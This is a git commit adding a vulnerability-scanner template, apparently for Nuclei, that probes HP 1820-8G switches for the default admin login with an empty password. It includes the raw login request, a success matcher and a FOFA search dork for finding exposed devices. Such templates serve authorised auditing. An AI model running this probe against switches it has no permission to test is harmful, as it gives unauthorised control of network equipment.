Add files via upload

patch-1
pussycat0x 2021-10-05 01:25:35 +05:30 committed by GitHub
parent 1e088e2c8c
commit 30c447d42b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: hp-1820-8G-switch-default-dredential
info:
name: HP 1820-8G Switch J9979A Default Credential
author: pussycat0x
severity: high
reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
metadata:
fofa-dork: 'HP 1820-8G Switch J9979A'
tags: default, hp
requests:
- raw:
- |
POST /htdocs/login/login.lua HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
username=admin&password=
matchers-condition: and
matchers:
- type: word
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
condition: and
- type: status
status:
- 200